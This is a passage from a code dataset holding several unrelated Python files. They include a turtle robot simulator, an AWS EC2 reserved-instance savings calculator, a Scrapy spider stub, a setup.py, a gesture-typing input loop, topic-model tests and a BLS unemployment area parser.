return True\n\ndef sprint(r, user_input: str):\n args = user_input.lower().split(' ', 1)\n if len(args) == 1:\n return f\"{r.name}: Sorry, I did not understand '{user_input}'.\", True\n if args[1].isdigit() == False:\n return f\"{r.name}: Sorry, I did not understand '{user_input}'.\", True\n n = int(args[1])\n if validate_pos(r, (n*(n+1)//2), user_input):\n for i in range(-n, 0):\n cmd = f'forward {-i}'\n out = move(r, 
cmd)[0]\n            print(out)\n    robo.pu()\n    robo.seth(headings[r.direction])\n    robo.goto(r.pos[1], r.pos[0])\n    return '', True\n\n\ndef move(r, user_input):\n    \"\"\"moves the robot backward or forward depending on user input\n    ie. 'forward 20' will move the robot forward by 20 and\n    'back 20' will move the robot back 20\"\"\"\n    args = user_input.lower().split(' ', 1)\n    d = ('back' if 'back' in args else 'forward')\n    if len(args) == 1:\n        return f\"{r.name}: Sorry, I did not understand '{user_input}'\", True\n    if args[1].isdigit() == False:\n        return f\"{r.name}: Sorry, I did not understand '{user_input}'\", True\n    if validate_pos(r, int(args[1]), user_input):\n        n = int(args[1])*(-1 if r.direction > 1 else 1)*(-1 if 'back' in args else 1)\n        r.pos[r.direction%2] += n\n        robo.pu()\n        robo.seth(headings[r.direction])\n        screen.tracer(1)\n        robo.speed(0)\n        robo.goto(r.pos[1], r.pos[0])\n        return f' > {r.name} moved {d} by {args[1]} steps.', True\n    else:\n        return '', True\n\ndef off(r, user_input):\n    \"\"\"Turns off the robot...\"\"\"\n    return f'{r.name}: Shutting down..', False\n\ndef turn(r, user_input):\n    args = user_input.lower().split(' ', 1)\n    n = (-1 if 'left' in args else 1)\n    r.direction = (r.direction + n)%4\n    d = ('left' if 'left' in args else 'right')\n    robo.seth(headings[r.direction])\n    return f' > {r.name} turned {d}.', True\n\ndef help_f(r, user_input):\n    help_string=\"\"\"I can understand these commands:\nOFF - Shut down robot\nHELP - provide information about commands\nFORWARD - move forward by specified number of steps, e.g. 'FORWARD 10'\nBACK - move backward by specified number of steps, e.g. 'BACK 10'\nRIGHT - turn right by 90 degrees\nLEFT - turn left by 90 degrees\nSPRINT - sprint forward according to a formula\nREPLAY - replays all movement commands from history [FORWARD, BACK, RIGHT, LEFT, SPRINT]\n\"\"\"\n    return help_string, True\n\ndef show_position(r):\n    return (f' > {r.name} now at position ({r.pos[1]},{r.pos[0]}).')\n\ndef replay(r, user_input):\n    commands = {'off':off, 'help':help_f, 'forward': move, 'left':turn, 'right':turn, 'back':move,'sprint':sprint , 'replay':replay}\n    options = [\"replay\", \"reversed\", \"silent\"]\n    arg = user_input.lower().split()\n    silent = (True if 'silent' in arg else False)\n    reverse = (True if 'reversed' in arg else False)\n    h = r.history[::-1] if reverse else r.history\n    new_args = list(filter(lambda x: x.isdigit() == False and '-' not in x, arg))\n    for x in new_args:\n        if x not in options:\n            return f\"{r.name}: Sorry, I did not understand '{user_input}'.\", True\n    ra = list(filter(lambda x: x.isdigit() or '-' in x, arg))\n    if len(ra) == 1:\n        ra = ra[0]\n        if ra.isdigit():\n            h = h[-int(ra):]\n        else:\n            ra = ra.split('-',1)\n            r1, r2 = [x for x in ra]\n            if r1.isdigit() and r2.isdigit():\n                h = h[-int(r1): -int(r2)]\n            else:\n                return f\"{r.name}: Sorry, I did not understand '{user_input}'.\", True\n    for i in h:\n        user_input = cmd = i\n        cmd = cmd.strip().lower().split()\n        out = commands[cmd[0]](r, user_input)[0]\n        if not silent:\n            print(out)\n    print(show_position(r))\n    print(f' > HAL replayed {len(h)} commands'+(' in reverse' if reverse else '')+(' silently' if silent else '')+'.')\n    return '', True\n\ndef set_up():\n    screen.tracer(0)\n    screen.delay(0)\n    draw_screen()\n    obs = maze.get_obstacles()\n    for o in obs:\n        draw_square(o[0], o[1])","sub_path":"world/turtle/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":5716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"553714830","text":"\"\"\"\nHere is the query in Athena that I used to produce the data\n\nQuery:\nSELECT\n lineitem_usageenddate AS UsageEndDate,\n product_instancetype AS InstanceType,\n lineitem_usagetype AS UsageType,\n SUM(CAST(lineitem_usageamount AS DOUBLE)) AS UsageAmount,\n SUM(CAST(lineitem_unblendedcost AS DOUBLE)) AS UnBlendedCost,\n lineitem_operation AS Operation,\n product_tenancy AS Tenancy,\n product_operatingsystem AS OperatingSystem,\n product_region AS Region\nFROM\n \"cz_live_billing_detailed\".\"342727989639\"\nWHERE\n from_iso8601_timestamp(lineitem_usageenddate) >= from_iso8601_timestamp('2018-10-01T00:00:00Z')\n AND from_iso8601_timestamp(lineitem_usageenddate) < from_iso8601_timestamp('2019-01-01T00:00:00Z')\n AND product_productname = 'Amazon Elastic Compute Cloud'\n AND lineitem_operation LIKE '%RunInstance%'\n AND LOWER(lineitem_usagetype) LIKE '%usage%'\n AND (lineitem_lineitemtype = 'Usage' OR lineitem_lineitemtype = 'DiscountedUsage')\nGROUP BY\n lineitem_usageenddate, product_region, product_instancetype, lineitem_usagetype, lineitem_operation, product_tenancy, product_operatingsystem\n\nHere is the link to the current EC2 pricing AWS posts:\nhttps://pricing.us-east-1.amazonaws.com/offers/v1.0/aws/AmazonEC2/current/index.csv\n\nMight want to look into exponentially weighted quantile regression to do time-based weighting\n\nA EC2 Reservation is made up of:\nRegion\nInstanceFamily\n[InstanceSize]\nTenancy\nOperating System\n----- AND -----\nReservation Length\nOffering Class (Convertible or Non Convertible)\nPurchaseOption (All Upfront, Partial Upfront, No Upfront)\n\n\n\"\"\"\n\nimport json\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nimport datetime as dt\n\n\nd_normalization = {'nano': 0.25,\n 'micro': 0.5,\n 'small': 1,\n 'medium': 2,\n 'large': 4,\n 'xlarge': 8,\n '2xlarge': 16,\n '4xlarge': 32,\n '8xlarge': 64,\n '9xlarge': 72,\n '10xlarge': 80,\n '12xlarge': 96,\n '16xlarge': 128,\n '18xlarge': 144,\n '24xlarge': 192,\n '32xlarge': 256}\nd_normalization_rev = {value: key for key, value in d_normalization.items()}\n\nd_regions = {'APN1': 'Asia Pacific (Tokyo)',\n 'APN2': 'Asia Pacific (Seoul)',\n 'APS1': 'Asia Pacific (Singapore)',\n 'APS2': 'Asia Pacific (Sydney)',\n 'APS3': 'Asia Pacific (Mumbai)',\n 'CAN1': 'Canada (Central)',\n 'EUC1': 'EU (Frankfurt)',\n 'EU': 'EU (Ireland)',\n 'EUW2': 'EU (London)',\n 'EUW3': 'EU (Paris)',\n 'SAE1': 'South America (Sao Paulo)',\n 'UGW1': 'AWS GovCloud (US-West)',\n 'USE1': 'US East (N. Virginia)',\n 'USE2': 'US East (Ohio)',\n 'USW1': 'US West (N. 
California)',\n 'USW2': 'US West (Oregon)'}\n\n# Missing Codes for d_regions:\n# AWS GovCloud (US)\n# EU (Stockholm)\n# AWS GovCloud (US-East)\n# Asia Pacific (Osaka-Local)\n\nd_regions_rev = {value: key for key, value in d_regions.items()}\n\nd_region_codes = {'us-east-1': 'USE1',\n 'us-east-2': 'USE2',\n 'us-west-1': 'USW1',\n 'us-west-2': 'USW2',\n 'ap-northeast-1': 'APN1',\n 'ap-southeast-2': 'APS2',\n 'ap-southeast-1': 'APS1',\n 'eu-west-1': 'EU',\n 'eu-central-1': 'EUC1',\n 'ca-central-1': 'CAN1'}\n\nd_os_trans = {'Linux/UNIX': '----',\n 'Linux/UNIX (Amazon VPC)': '----',\n 'Windows': '0002',\n 'Windows (Amazon VPC)': '0002',\n 'Red Hat Enterprise Linux (Amazon VPC)': '0010',\n 'Windows with SQL Server Standard (Amazon VPC)': '0006',\n 'Linux with SQL Server Standard (Amazon VPC)': '0004'}\nd_os_trans_rev = {value: key for key, value in d_os_trans.items()}\n\ns_month = '201810-201812'\ns_client_name = 'cengage'\ns_local_path = '/Users/strong/Dropbox (cloudzero)/CZResearch/czclients/' + s_client_name + '/ec2-usage/' + s_month + '/'\ns_filepath = s_local_path + s_client_name + '-ec2-usage-cost-' + s_month + '.csv'\ndf_data = pd.read_csv(s_filepath)\n\ns_res_path = '/Users/strong/Dropbox (cloudzero)/CZResearch/czclients/' + s_client_name + '/'\ns_ri_json = s_res_path + s_client_name + '_reserved_instances_20190117.json'\n\n# Get current reservation information\nwith open(s_ri_json, 'r') as f:\n ldf_ri = json.load(f)\n\nfor i, d_region_ris in enumerate(ldf_ri):\n if len(d_region_ris) == 0:\n continue\n s_region = d_region_ris['region']\n ld_region_ris = d_region_ris['data']['ReservedInstances']\n if i == 0:\n df_ri = pd.DataFrame(ld_region_ris)\n df_ri['RegionCode'] = s_region\n else:\n df_temp = pd.DataFrame(ld_region_ris)\n df_temp['RegionCode'] = s_region\n df_ri = df_ri.append(df_temp)\n\n# df_ri = pd.DataFrame(df_ri['ReservedInstances'])\ndf_ri['RecurringChargesAmount'] = df_ri['RecurringCharges'].apply(lambda x: x[0].get('Amount') if len(x) > 0 else np.nan)\ndf_ri['RecurringChargesFrequency'] = df_ri['RecurringCharges'].apply(lambda x: x[0].get('Frequency') if len(x) > 0 else np.nan)\n\ndf_ri.reset_index(inplace=True)\ndf_ri['RecurringChargesAmount'][np.logical_and(df_ri['RecurringChargesAmount'].isna(),\n df_ri['OfferingType'] == 'All Upfront')] = 0.0\ndf_ri['EffectiveHourlyRate'] = (df_ri['FixedPrice']/(df_ri['Duration']/3600) +\n df_ri['RecurringChargesAmount'])\n\ndf_ri['UnAccountedHourlyRate'] = df_ri['FixedPrice']/(df_ri['Duration']/3600)\ndf_ri['OperatingSystem'] = df_ri['ProductDescription'].apply(lambda x: d_os_trans.get(x, np.nan))\ndf_ri['InstanceFamily'] = df_ri['InstanceType'].apply(lambda x: x.split('.')[0])\n\n# This amount is what is spent no matter what is actually used\n# (i.e. 
it has already been spent at the beginning of the reservation)\ndf_ri['UnAccountedHourlySpend'] = df_ri['InstanceCount'] * df_ri['UnAccountedHourlyRate']\ndf_ri['NormalizationType'] = df_ri['InstanceType'].apply(lambda x: x.split('.')[-1])\ndf_ri['NormalizationFactor'] = df_ri['NormalizationType'].apply(lambda x:\n                                                               d_normalization.get(x, np.nan))\n\ndf_ri['Region'] = df_ri['RegionCode'].apply(lambda x: d_region_codes[x])\n\ndf_ri['Start'] = pd.to_datetime(df_ri['Start'])\ndf_ri['End'] = pd.to_datetime(df_ri['End'])\n\ndt_start = df_ri['Start'].min().to_pydatetime()\ndt_start = dt_start.replace(hour=0, minute=0, second=0, microsecond=0)\ndt_end = df_ri['End'].max().to_pydatetime()\n\ni_total_hours = int(np.ceil((dt_end - dt_start).total_seconds()/3600)) + 1\nldt_datetimes = [dt_start + dt.timedelta(hours=i) for i in range(i_total_hours)]\n\ndf_tracker = pd.DataFrame(index=ldt_datetimes, columns=df_ri['ReservedInstancesId'].unique())\nls_ri_ids = df_ri['ReservedInstancesId'].unique()\ndf_ri.set_index('ReservedInstancesId', inplace=True)\n\nfor i, s_ri_id in enumerate(df_tracker.columns):\n    df_tracker[s_ri_id][df_ri.iloc[i]['Start']:df_ri.iloc[i]['End']] = 1\n\ndf_tracker = (df_ri['EffectiveHourlyRate'] * df_ri['InstanceCount']) * df_tracker\n\n# Process EC2 Pricing Data\ns_ec2_pricing_path = 'aws_ec2_pricing.csv'\ndf_pricing = pd.read_csv(s_ec2_pricing_path, header=5)\ndf_pricing = df_pricing[~df_pricing['operation'].isna()]\ndf_pricing = df_pricing[~df_pricing['Instance Type'].isna()]\ndf_pricing = df_pricing[df_pricing['operation'].str.startswith('RunInstances')]\ndf_pricing['OperatingSystem'] = df_pricing['operation'].str.split(':').apply(lambda x:\n                                                                             x[1] if len(x) > 1 else '----')\ndf_pricing['Region'] = df_pricing['Location'].apply(lambda x: d_regions_rev.get(x, 'unknown'))\ndf_pricing['InstanceFamily'] = df_pricing['Instance Type'].str.split('.').apply(lambda x: x[0])\ndf_pricing['InstanceSize'] = df_pricing['Instance Type'].str.split('.').apply(lambda x: x[1] if len(x) > 1\n                                                                              else 'small')\ndf_pricing['NormalizationFactor'] = df_pricing['InstanceSize'].apply(lambda x:\n                                                                     d_normalization.get(x, np.nan))\ndf_ondemand = df_pricing[df_pricing['TermType'] == 'OnDemand']\ndf_reserved = df_pricing[df_pricing['TermType'] == 'Reserved']\n\ndf_ondemand = df_ondemand[~df_ondemand['usageType'].str.contains('Reservation')]\ndf_ondemand = df_ondemand[~df_ondemand['usageType'].str.contains('Unused')]\n\n# Set the index to the 5 attributes that make up a reservation\ndf_reserved = df_reserved.set_index(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy', 'OperatingSystem'])\ndf_ondemand = df_ondemand.set_index(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy', 'OperatingSystem'])\n\ndf_usage = df_data[df_data['UsageType'].str.lower().str.contains('usage')]\n\ndf_usage['UsageEndDate'] = pd.to_datetime(df_usage['UsageEndDate'])\n\ndt_start_usage = df_usage['UsageEndDate'].min().to_pydatetime()\ndt_end_usage = df_usage['UsageEndDate'].max().to_pydatetime()\n\nf_total_ri_costs = df_tracker.loc[dt_start_usage:dt_end_usage].sum().sum()\n\ndf_usage['Region'] = df_usage['UsageType'].str.split('-').apply(lambda x: x[0] if len(x) > 1 else 'USE1')\ndf_usage['InstanceFamily'] = df_usage['UsageType'].str.split(':').apply(lambda x: x[1].split('.')[0] if len(x) > 1\n                                                                        else 'm1')\ndf_usage['InstanceSize'] = df_usage['UsageType'].str.split(':').apply(lambda x: x[1].split('.')[1] if len(x) > 1\n                                                                      else 'small')\ndf_usage['OperatingSystem'] = df_usage['Operation'].str.split(':').apply(lambda x: x[1] if len(x) > 1 
else '----')\n\ndf_usage['NormalizationFactor'] = df_usage['InstanceSize'].apply(lambda x:\n d_normalization.get(x, np.nan))\ndf_usage['NormalizedUsage'] = df_usage['UsageAmount'] * df_usage['NormalizationFactor']\n\n# Any un-specified tenancy we assume is shared\ndf_usage['Tenancy'].fillna('Shared', inplace=True)\n\ndf_usage['date'] = df_usage['UsageEndDate'].dt.date\ndf_usage['hour'] = df_usage['UsageEndDate'].dt.hour\n\nf_total_cost_spot = df_usage[df_usage['OperatingSystem'].str.startswith('SV')]['UnBlendedCost'].sum()\n\ndf_summed_usage = df_usage.groupby(['Region', 'InstanceFamily', 'InstanceSize',\n 'Tenancy', 'OperatingSystem', 'date', 'hour'])['NormalizedUsage'].sum()\ndf_summed_usage = df_summed_usage.reset_index()\n\ngrouper = df_summed_usage.groupby(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy', 'OperatingSystem'])\nlt_groups = list(grouper.groups.keys())\n\nna_dates = np.sort(df_summed_usage['date'].unique())\nna_hours = np.tile(np.arange(24), len(na_dates))\nna_dates = na_dates.repeat(24)\nna_data = np.vstack((na_dates, na_hours)).T\n\nfor i, t_group in enumerate(lt_groups):\n if i == 0:\n df_zeros = pd.DataFrame(data=na_data, columns=['date', 'hour'])\n df_zeros['Region'] = t_group[0]\n df_zeros['InstanceFamily'] = t_group[1]\n df_zeros['InstanceSize'] = t_group[2]\n df_zeros['Tenancy'] = t_group[3]\n df_zeros['OperatingSystem'] = t_group[4]\n df_zeros['NormalizedUsage'] = 0.0\n else:\n df_temp = pd.DataFrame(data=na_data, columns=['date', 'hour'])\n df_temp['Region'] = t_group[0]\n df_temp['InstanceFamily'] = t_group[1]\n df_temp['InstanceSize'] = t_group[2]\n df_temp['Tenancy'] = t_group[3]\n df_temp['OperatingSystem'] = t_group[4]\n df_temp['NormalizedUsage'] = 0.0\n df_zeros = df_zeros.append(df_temp)\n\ndf_summed_usage = (df_zeros.set_index(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy',\n 'OperatingSystem', 'date', 'hour']) +\n df_summed_usage.set_index(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy',\n 'OperatingSystem', 'date', 'hour']))\ndf_summed_usage.fillna(0.0, inplace=True)\ndf_summed_usage = df_summed_usage.reset_index()\n\n# Iterate through usage that must be allocated to specifically sized RIs\nf_total_od_costs = 0.0\nfor name, group in df_summed_usage.groupby(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy',\n 'OperatingSystem']):\n if name[4].startswith('SV'):\n # This is a spot instance and will be added to the total cost later.\n continue\n\n df_od_options = df_ondemand.loc[name]\n\n i_instance_size = d_normalization[name[2]]\n\n i_loc_od = np.where(df_od_options['NormalizationFactor'] == i_instance_size)[0][0]\n f_hourly_cost_od = df_od_options.iloc[i_loc_od]['PricePerUnit']\n\n f_total_usage_hours = (group['NormalizedUsage']/float(i_instance_size)).sum()\n f_total_group_cost_od = f_total_usage_hours * f_hourly_cost_od\n f_total_od_costs += f_total_group_cost_od\n\nf_total_current_cost = df_usage['UnBlendedCost'].sum() + f_total_ri_costs\nf_total_all_od_cost = f_total_od_costs + f_total_cost_spot\nprint('EC2 Usage: Total Current Costs from', dt_start_usage, 'to', dt_end_usage, ':', f_total_current_cost)\nprint('EC2 Usage: Total Costs if all On Demand from', dt_start_usage, 'to', dt_end_usage, ':', f_total_all_od_cost)\nprint('Reserved Instance savings rate:', 1 - (f_total_current_cost/f_total_all_od_cost))\nii = 20\n","sub_path":"ri_performance.py","file_name":"ri_performance.py","file_ext":"py","file_size_in_byte":13675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 
+{"seq_id":"283672560","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n\nclass Spider3Spider(CrawlSpider):\n name = 'spider3'\n allowed_domains = ['tieba.baidu.com']\n start_urls = ['http://tieba.baidu.com/']\n\n\n #定义提取url规则\n rules = (\n Rule(LinkExtractor(allow=r'Items/'), callback='parse_item'), #还有其他参数,正则匹配当前页所有url follow表示是否循环匹配\n Rule(LinkExtractor(allow=r'Items/'), follow=True), #循环执行\n # Rule(LinkExtractor(restrict_xpaths=r'//div'), follow=True), #查找符合区域的所有url\n )\n\n def parse_item(self, response):\n item = {}\n #item['domain_id'] = response.xpath('//input[@id=\"sid\"]/@value').get()\n #item['name'] = response.xpath('//div[@id=\"name\"]').get()\n #item['description'] = response.xpath('//div[@id=\"description\"]').get()\n return item\n","sub_path":"python_spider_example/spider1/myspider1/myspider1/spiders/spider3.py","file_name":"spider3.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"475999934","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\nreadme = open('README.md').read()\nsetup(name='pyharmony',\n version='1.0',\n description='Python API for Logitech Harmony Hub',\n author='Jeff Terrace',\n author_email='jterrace@gmail.com',\n url='http://www.github.com/zonyl/pyharmony',\n packages=find_packages())\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"124032853","text":"import read_serial\nimport oscilloscope\nimport keyboard\nimport panel\nimport pygame\nimport entry\nimport time\nimport math\nimport event\nimport log\n\nlog = log.Log()\nentry = entry.Entry(5000, entry.LanguageModel.USE_TRIGRAMS)\ninput = read_serial.ReadSerial()\ninput.get_data()\npan = panel.Panel(entry)\nlog.start_phrase(pan.text_task)\nprint( 'Trial', pan.phrase_cnt, 'begin.' )\n\npitchs = []\nheadings = []\nevent = event.Event()\n\ndef clear():\n global pitchs\n global headings\n global pan\n global down_pitch\n global down_heading\n pitchs = []\n headings = []\n pan.clear_candidates_bar()\n pan.update_visual_row(None)\n\nT = 0\n\nwhile True:\n T += 1\n if T % 10 == 0 and (keyboard.is_pressed('q') or pan.phrase_cnt == 10):\n break\n if T % 10 == 5 and len(pan.text_inputed) > 0:\n if keyboard.is_pressed('y'): # Next phrase\n log.end_phrase(True)\n pan.next_phrase()\n log.start_phrase(pan.text_task)\n clear()\n print( 'Trial', pan.phrase_cnt, 'begin.' 
)\n elif keyboard.is_pressed('n'): # Redo the phrase\n log.end_phrase(False)\n pan.redo_phrase()\n log.start_phrase(pan.text_task)\n clear()\n data = input.get_data() # [t, gx, gy, gz, ax, ay, az, gra_x, gra_y, gra_z, pitch, heading, is_touch]\n log.log_raw_data(data)\n\n timestamp = data[0]\n pitch = data[10]\n heading = data[11]\n\n curr_event = event.get_event(data)\n if curr_event == event.SLIDE_LEFT: # Deletion\n if len(pitchs) == 0: # Delete a word\n pan.text_delete_word()\n log.delete_a_word()\n else: # Delete letters\n log.delete_letters()\n clear()\n\n if len(pan.candidates) >= 1 and pan.selecting == None and curr_event == event.LONG_PRESS: # Trigger Selection\n pan.start_selection(heading, pitch)\n \n if pan.selecting != None:\n pan.update_selection(heading, pitch)\n \n if curr_event == event.TOUCH_DOWN:\n down_pitch = pitch\n down_heading = heading\n \n if curr_event == event.TOUCH_UP: # Confirm\n if pan.selecting == None: # Typing\n # pan.update_visual_row(down_pitch) # Visual feedback\n pitchs.append(down_pitch)\n headings.append(down_heading)\n candidates = entry.predict(pitchs, headings)\n pan.update_candidates(candidates)\n log.entry_a_letter(down_pitch, down_heading)\n else: # Selection\n word = pan.get_selecting_candidate()\n pan.text_add_word(word)\n clear()\n if word == '':\n log.delete_letters()\n else:\n log.entry_a_word(word)\n\npan.stop()\ntime.sleep(1)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532332198","text":"import pprint\nfrom nose.tools import assert_equal\nfrom nose.tools import assert_not_equal\nfrom patterny.config import Config\nfrom patterny.ml.tmodel import TopicModel\nfrom utils import OVERLAP_CONFIG_FILE, MODELS_FOLDER\n\n\nDATA = [\n # D0 - T1\n \"\"\"\n If you are navigating through the list of open tabs inside the All+Tabs panel and you wanna filter by a term you have to select the search text field first.\n It would be nice if any entered character is automatically routed to the search field and the filter gets applied.\n \"\"\",\n # D1 - T1\n \"\"\"\n In maximized mode there is something like 3 pixels padding on the right side of \"All tabs\" panel.\n It doesn't exist on the left side of panel and in not maximized mode.\n \"\"\",\n # D2 - T1\n \"\"\"\n When you have the All+Tabs panel open it would be great if you can press Cmd/Ctrl+F to focus the search text field. Right now the panel gets hidden and the Find toolbar is shown without focus.\n IMO using the command inside the All+Tabs panel would make more sense.\n \"\"\",\n # D3 - T2\n \"\"\"\n Steps to reproduce:\n Nothing... had multiple windows and tiles open... for about 4 hours\n\n Actual results:\n Crashed without warning\n \"\"\",\n # D4 - T0\n \"\"\"\n Firefox crashes at leat 6 times a day. Installed latest version but still crashing. 
Goes very slow before it crashes.\n \"\"\",\n # D5 - T0\n \"\"\"\n Steps to reproduce:\n W have installed Firefox 18 (as we did with all previous version) on Solaris 10 SPAC 64b\n\n Actual results:\n When we tried to start it form a console, it crashed with a message: Segmentation fault.\n And it produced a core dump\n\n Expected results:\n Firefox should have open correctly\n \"\"\",\n # D6 - T3\n \"\"\"\n screen shots: Aurora 7.0a2 top, FF 3.6.18 bottom\n\n User Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:7.0a2) Gecko/20110709 Firefox/7.0a2\n Build ID: 20110709042004\n\n Steps to reproduce:\n\n Start Aurora with a new Profile just to be sure\n Open Menu Preferences\n Select Advanced | Encryption , View Certificates\n Select tab certificates, scroll down to Thawte\n Select first Thawte Certificate, click \"view...\" button\n\n (Actually the problem is not specific to this single certificate. I tried many more built-in root certificates and they all had the same issue.)\n\n\n\n Actual results:\n\n Certificate Viewer opens, it says \"could not verify this certificate for unknown reasons\"\n\n\n Expected results:\n\n Certificate Viewer opens, it should say \"this certificates has been verified for the following uses\" and a list of uses.\n \"\"\",\n # D7 - None (for 4 topics, probs = [0.25, 0.25, 0.25, 0.25])\n \"\"\"\n I agree with the utility of this feature it's just going to take some serious work. This is a pretty hacky area of the code that is screaming for a rewrite.\n\n I'll slate this for 1.1\n \"\"\"\n]\n\n\nclass TestTopicModel(object):\n def setup(self):\n self.pp = pprint.PrettyPrinter(indent=2)\n with open(OVERLAP_CONFIG_FILE) as f:\n self.config = Config(f)\n\n def teardown(self):\n pass\n\n def test_build_sample_data(self):\n n_topics = 4\n n_top_words = 5\n tmodel = TopicModel(n_samples=10, n_features=20, n_topics=n_topics, n_top_words=n_top_words)\n tmodel.build(DATA, debug=True)\n\n assert_not_equal(tmodel.topics, None)\n assert_not_equal(tmodel.topics.keys(), None)\n assert_not_equal(len(tmodel.topics.keys()), 0)\n assert_equal(len(tmodel.topics.keys()), n_topics)\n\n for topic_idx, topic in tmodel.topics.iteritems():\n assert_equal(len(topic.topic_overview), n_top_words)\n\n def test_save_load_model(self):\n n_topics = 4\n n_top_words = 5\n tmodel = TopicModel(n_samples=10, n_features=20, n_topics=n_topics, n_top_words=n_top_words)\n tmodel.build(DATA, debug=True)\n tmodel.save(MODELS_FOLDER)\n\n new_tmodel = TopicModel(n_samples=10, n_features=20, n_topics=n_topics, n_top_words=n_top_words)\n new_tmodel.load(MODELS_FOLDER)\n\n assert_not_equal(new_tmodel.topics, None)\n assert_not_equal(new_tmodel.topics.keys(), None)\n assert_not_equal(len(new_tmodel.topics.keys()), 0)\n assert_equal(len(new_tmodel.topics.keys()), n_topics)\n\n for topic_idx, topic in new_tmodel.topics.iteritems():\n assert_equal(len(topic.topic_overview), n_top_words)\n","sub_path":"patterny/tests/test_ml_tmodel.py","file_name":"test_ml_tmodel.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532484470","text":"import time\r\n\r\nmy_list = [0, 5, 2, 4, 7, 1, 3, 19]\r\n\r\nnechet_list = (list(filter(\r\n lambda x: x % 2 == 1,\r\n my_list\r\n)))\r\nprint(len(nechet_list))\r\n\r\ncounter = 0\r\n\r\nwhile True:\r\n print(1)\r\n time.sleep(5)\r\n\r\nfor item in my_list:\r\n if item % 2 == 1:\r\n counter += 
1\r\nprint(counter)","sub_path":"HW_Start_5/HW5_5.py","file_name":"HW5_5.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"644926601","text":"import pandas as pd\nimport requests as r\nfrom db_layer import sql_caller\n\nurl = 'https://download.bls.gov/pub/time.series/la/la.area'\ndelimeter = '\\t'\nseries_id_len = 20\ndata = r.get(url)\n\nrow_list = []\n\ncount = 0\nfor line in data.text.splitlines():\n    if count == 0:\n        headers = [x.strip() for x in line.split(delimeter)]\n        count += 1\n    else:\n        row = [x.strip() for x in line.split(delimeter, maxsplit=len(headers) - 1)]\n\n        # make sure we only look at MSAs\n        if row[0] not in ['A','D','B', 'F']:\n            continue\n\n        if len(row) > series_id_len:\n            print('seriesid length is greater than {}'.format(series_id_len))\n            continue\n\n        if len(row) < len(headers):\n            row.append('n/a')\n            row_list.append(row)\n        else:\n            row_list.append(row)\n        count += 1\n\ndf = pd.DataFrame(row_list, columns=headers)\n\nfor i, row in df.iterrows():\n    if row['area_type_code'] == 'A':\n        if row['area_code'][2:4] == '72':\n            df.drop(i, inplace=True)\n            continue\n        df.at[i, 'Geo_ID'] = row['area_code'][2:4]\n        df.at[i, 'Geo_Type'] = 'States'\n\n    elif row['area_type_code'] == 'B':\n        if row['area_code'][2:4] == '72':\n            df.drop(i, inplace=True)\n            continue\n        df.at[i, 'Geo_ID'] = row['area_code'][4:9]\n        df.at[i, 'Geo_Type'] = 'Metro'\n\n    elif row['area_type_code'] == 'D':\n        if row['area_code'][2:4] == '72':\n            df.drop(i, inplace=True)\n            continue\n        df.at[i, 'Geo_ID'] = row['area_code'][4:9]\n        df.at[i, 'Geo_Type'] = 'Micro'\n\n    elif row['area_type_code'] == 'F':\n        if row['area_code'][2:4] == '72':\n            df.drop(i, inplace=True)\n            continue\n        df.at[i, 'Geo_ID'] = row['area_code'][2:7]\n        df.at[i, 'Geo_Type'] = 'County'\n\nMSA_to_CBSA_conversion = {\n    '70750':'12620','70900':'12700','71050':'12740','71350':'13540','71500':'13620','71650':'14460','71950':'14860','72400':'15540','72700':'18180',\n    '19380':'19430','73450':'25540','73750':'28300','73900':'29060','74350':'30100','74650':'30340','74950':'31700','75700':'35300','76450':'35980',\n    '36860':'36837','76600':'38340','76750':'38860','39140':'39150','77200':'39300','77650':'40860','78100':'44140','78400':'45860','78500':'47240',\n    '11680':'49060','79600':'49340'}\n\nfor k,v in MSA_to_CBSA_conversion.items():\n    if k in list(df['Geo_ID']):\n        df.loc[df['Geo_ID'] == k, 'Geo_ID'] = v\n\n\n\ndf.to_excel('Geo names.xlsx')","sub_path":"unemployment_parser/get_msa_names.py","file_name":"get_msa_names.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
